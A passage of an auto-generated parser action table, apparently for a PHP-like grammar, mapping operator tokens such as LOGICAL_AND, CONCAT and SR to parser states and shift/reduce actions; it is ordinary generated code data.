723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,134,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,134,-190,-429,-430,134,134,134,134,134,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,134,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,134,134,134,134,134,134,-348,-363,-227,-228,-349,-364,-428,134,134,-443,-443,-244,-248,-250,134,-289,-290,134,134,134,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,-183,-197,-188,-253,134,134,-345,134,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,134,134,-209,134,-429,572,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,134,-238,134,134,134,-353,-182,-234,-229,-189,-443,-230,-252,134,134,-333,-336,-337,-346,-443,134,-361,134,134,-218,-235,-236,-240,-392,-393,572,-380,-390,572,-402,-249,134,134,134,-196,134,-191,-194,134,-205,-223,-210,-231,-232,-211,-403,-404,572,572,572,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,134,-231,-193,-232,134,134,-222,134,-212,-213,-214,-215,-394,572,-402,572,-246,-247,-195,-443,134,-224,-216,-217,572,134,-271,572,134,572,]),'LOGICAL_AND':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,135,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,135,-190,-429,-430,135,135,135,135,135,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,135,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,135,135,135,135,135,-347,-348,-363,-227,-228,-349,-364,-428,135,135,-443,-443,-244,-248,-250,135,-289,-290,-291,135,135,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,135,135,135,135,135,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,135,135,-345,135,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,135,135,-209,135,-429,573,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,135,-238,-320,135,135,-353,-182,-234,-229,-189,-443,-230,-252,135,135,-333,-336,-337,-346,-443,135,-361,135,135,-218,-235,-236,-240,-392,-393,573,-380,-390,573,-402,-249,-319,135,135,-196,135,-191,-194,135,-205,-223,-210,-231,-232,-211,-403,-404,-405,573,573,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,135,-231,-193,-232,-199,135,-222,135,-212,-213,-214,-215,-394,573,-402,573,-246,-247,-195,-443,135,-224,-216,-217,573,135,-271,573,135,573,]),'LOGICAL_OR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,136,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,136,-190,-429,-430,136,136,136,136,136,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,136,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,136,136,136,136,136,-347,-348,-363,-227,-228,-349,-364,-428,136,136,-443,-443,-244,-248,-250,136,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,136,136,136,136,136,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,136,136,-345,136,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,136,136,-209,136,-429,574,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,136,-238,-320,136,136,-353,-182,-234,-229,-189,-443,-230,-252,136,136,-333,-336,-337,-346,-443,136,-361,136,136,-218,-235,-236,-240,-392,-393,574,-380,-390,574,-402,-249,-319,136,136,-196,136,-191,-194,136,-205,-223,-210,-231,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,136,-231,-193,-232,-199,136,-222,136,-212,-213,-214,-215,-394,574,-402,574,-246,-247,-195,-443,136,-224,-216,-217,574,136,-271,574,136,574,]),'LOGICAL_XOR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,137,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,137,-190,-429,-430,137,137,137,137,137,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,137,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,137,137,137,137,137,-347,-348,-363,-227,-228,-349,-364,-428,137,137,-443,-443,-244,-248,-250,137,-289,-290,-291,137,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,137,137,137,137,137,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,137,137,-345,137,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,137,137,-209,137,-429,575,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,137,-238,-320,137,137,-353,-182,-234,-229,-189,-443,-230,-252,137,137,-333,-336,-337,-346,-443,137,-361,137,137,-218,-235,-236,-240,-392,-393,575,-380,-390,575,-402,-249,-319,137,137,-196,137,-191,-194,137,-205,-223,-210,-231,-232,-211,-403,-404,-405,575,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,137,-231,-193,-232,-199,137,-222,137,-212,-213,-214,-215,-394,575,-402,575,-246,-247,-195,-443,137,-224,-216,-217,575,137,-271,575,137,575,]),'AND':([12,17,34,35,39,43,44,45,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,110,111,116,117,119,165,167,169,178,181,187,191,203,204,206,207,208,209,212,213,214,216,218,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,265,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,365,374,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,402,404,407,414,415,416,417,418,419,425,426,427,428,430,431,433,434,437,439,440,444,445,446,450,452,453,454,458,459,461,462,463,464,467,478,479,480,481,482,483,484,486,491,494,497,504,509,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,556,557,558,559,560,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,645,673,674,675,676,677,682,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,751,784,789,791,792,794,795,798,800,801,802,803,804,805,806,807,808,809,810,817,818,837,842,854,856,873,900,902,903,904,905,919,921,926,927,936,944,945,],[-362,138,184,-429,-180,-251,-430,222,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,138,184,-190,-429,-430,284,138,138,138,138,138,-370,375,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,222,138,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,138,138,138,138,138,138,-348,-363,284,-227,-228,-349,-364,-428,138,138,-443,-443,-244,-248,-250,138,138,138,138,138,138,-294,138,138,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,138,138,138,138,138,510,138,138,138,138,138,138,138,138,138,138,138,138,-183,284,-197,-188,-253,537,540,138,138,-345,138,-443,-352,284,-365,-385,-229,-366,-230,-357,-358,-219,138,138,284,-209,284,138,-429,576,-402,-378,-379,-382,-383,-384,-389,-430,-184,284,-221,-243,-245,138,-238,138,629,138,138,510,648,-353,-182,-234,-229,-189,-443,-230,-252,138,138,-333,-336,-337,-346,-443,138,-361,284,284,138,284,284,138,-218,-235,-236,-240,-392,-393,576,-380,-390,576,-402,-249,138,138,138,510,-196,138,-191,-194,138,796,-205,-223,-210,-231,-232,-211,576,576,576,576,576,-408,576,576,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,138,629,184,-231,-193,-232,138,138,-222,138,-212,-213,284,-214,-215,284,-394,576,-402,576,-246,-247,886,184,-195,-443,138,-224,-216,-217,576,138,-271,942,576,510,138,510,576,]),'OR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,139,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,139,-190,-429,-430,139,139,139,139,139,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,139,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,139,139,139,139,139,139,-348,-363,-227,-228,-349,-364,-428,139,139,-443,-443,-244,-248,-250,139,139,139,139,139,139,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,-183,-197,-188,-253,139,139,-345,139,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,139,139,-209,139,-429,577,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,139,-238,139,139,139,-353,-182,-234,-229,-189,-443,-230,-252,139,139,-333,-336,-337,-346,-443,139,-361,139,139,-218,-235,-236,-240,-392,-393,577,-380,-390,577,-402,-249,139,139,139,-196,139,-191,-194,139,-205,-223,-210,-231,-232,-211,577,577,577,577,577,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,139,-231,-193,-232,139,139,-222,139,-212,-213,-214,-215,-394,577,-402,577,-246,-247,-195,-443,139,-224,-216,-217,577,139,-271,577,139,577,]),'XOR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,140,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,140,-190,-429,-430,140,140,140,140,140,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,140,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,140,140,140,140,140,140,-348,-363,-227,-228,-349,-364,-428,140,140,-443,-443,-244,-248,-250,140,140,140,140,140,140,-294,140,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,-183,-197,-188,-253,140,140,-345,140,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,140,140,-209,140,-429,578,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,140,-238,140,140,140,-353,-182,-234,-229,-189,-443,-230,-252,140,140,-333,-336,-337,-346,-443,140,-361,140,140,-218,-235,-236,-240,-392,-393,578,-380,-390,578,-402,-249,140,140,140,-196,140,-191,-194,140,-205,-223,-210,-231,-232,-211,578,578,578,578,578,-408,578,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,140,-231,-193,-232,140,140,-222,140,-212,-213,-214,-215,-394,578,-402,578,-246,-247,-195,-443,140,-224,-216,-217,578,140,-271,578,140,578,]),'CONCAT':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,141,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,141,-190,-429,-430,141,141,141,141,141,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,141,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,141,141,141,141,141,141,-348,-363,-227,-228,-349,-364,-428,141,141,-443,-443,-244,-248,-250,141,141,141,141,141,141,141,141,141,-297,-298,-299,-300,-301,141,141,-304,141,141,141,141,141,141,141,141,-313,-314,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,-183,-197,-188,-253,141,141,-345,141,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,141,141,-209,141,-429,579,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,141,-238,141,141,141,-353,141,-234,-229,-189,-443,-230,-252,141,141,-333,-336,-337,-346,-443,141,-361,141,141,-218,-235,-236,-240,-392,-393,579,-380,-390,579,-402,-249,141,141,141,-196,141,-191,-194,141,-205,-223,-210,-231,-232,-211,579,579,579,579,579,579,579,579,-411,-412,-413,-414,-415,579,579,-418,579,579,579,579,579,579,579,579,-427,-381,-391,-395,-365,-366,-386,-220,141,-231,-193,-232,141,141,-222,141,-212,-213,-214,-215,-394,579,-402,579,-246,-247,-195,-443,141,-224,-216,-217,579,141,-271,579,141,579,]),'MUL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,144,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,144,-190,-429,-430,144,144,144,144,144,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,144,144,144,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,144,144,144,144,144,144,-348,-363,-227,-228,-349,-364,-428,144,144,-443,-443,-244,-248,-250,144,144,144,144,144,144,144,144,144,144,144,144,-300,-301,144,144,-304,144,144,144,144,144,144,144,144,-313,-314,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,-183,-197,-188,-253,144,144,-345,144,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,144,144,-209,144,-429,582,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,144,-238,144,144,144,-353,144,-234,-229,-189,-443,-230,-252,144,144,-333,-336,-337,-346,-443,144,-361,144,144,-218,-235,-236,-240,-392,-393,582,-380,-390,582,-402,-249,144,144,144,-196,144,-191,-194,144,-205,-223,-210,-231,-232,-211,582,582,582,582,582,582,582,582,582,582,582,-414,-415,582,582,-418,582,582,582,582,582,582,582,582,-427,-381,-391,-395,-365,-366,-386,-220,144,-231,-193,-232,144,144,-222,144,-212,-213,-214,-215,-394,582,-402,582,-246,-247,-195,-443,144,-224,-216,-217,582,144,-271,582,144,582,]),'DIV':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,145,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,145,-190,-429,-430,145,145,145,145,145,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,145,145,145,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,145,145,145,145,145,145,-348,-363,-227,-228,-349,-364,-428,145,145,-443,-443,-244,-248,-250,145,145,145,145,145,145,145,145,145,145,145,145,-300,-301,145,145,-304,145,145,145,145,145,145,145,145,-313,-314,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,-183,-197,-188,-253,145,145,-345,145,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,145,145,-209,145,-429,583,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,145,-238,145,145,145,-353,145,-234,-229,-189,-443,-230,-252,145,145,-333,-336,-337,-346,-443,145,-361,145,145,-218,-235,-236,-240,-392,-393,583,-380,-390,583,-402,-249,145,145,145,-196,145,-191,-194,145,-205,-223,-210,-231,-232,-211,583,583,583,583,583,583,583,583,583,583,583,-414,-415,583,583,-418,583,583,583,583,583,583,583,583,-427,-381,-391,-395,-365,-366,-386,-220,145,-231,-193,-232,145,145,-222,145,-212,-213,-214,-215,-394,583,-402,583,-246,-247,-195,-443,145,-224,-216,-217,583,145,-271,583,145,583,]),'SL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,146,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,146,-190,-429,-430,146,146,146,146,146,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,146,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,146,146,146,146,146,146,-348,-363,-227,-228,-349,-364,-428,146,146,-443,-443,-244,-248,-250,146,146,146,146,146,146,146,146,146,-297,-298,-299,-300,-301,-302,-303,-304,146,146,146,146,146,146,146,146,-313,-314,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,-183,-197,-188,-253,146,146,-345,146,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,146,146,-209,146,-429,584,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,146,-238,146,146,146,-353,146,-234,-229,-189,-443,-230,-252,146,146,-333,-336,-337,-346,-443,146,-361,146,146,-218,-235,-236,-240,-392,-393,584,-380,-390,584,-402,-249,146,146,146,-196,146,-191,-194,146,-205,-223,-210,-231,-232,-211,584,584,584,584,584,584,584,584,-411,-412,-413,-414,-415,-416,-417,-418,584,584,584,584,584,584,584,584,-427,-381,-391,-395,-365,-366,-386,-220,146,-231,-193,-232,146,146,-222,146,-212,-213,-214,-215,-394,584,-402,584,-246,-247,-195,-443,146,-224,-216,-217,584,146,-271,584,146,584,]),'SR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,147,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,147,-190,-429,-430,147,147,147,147,147,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,147,-315,-316,-317,-318,-321,-228,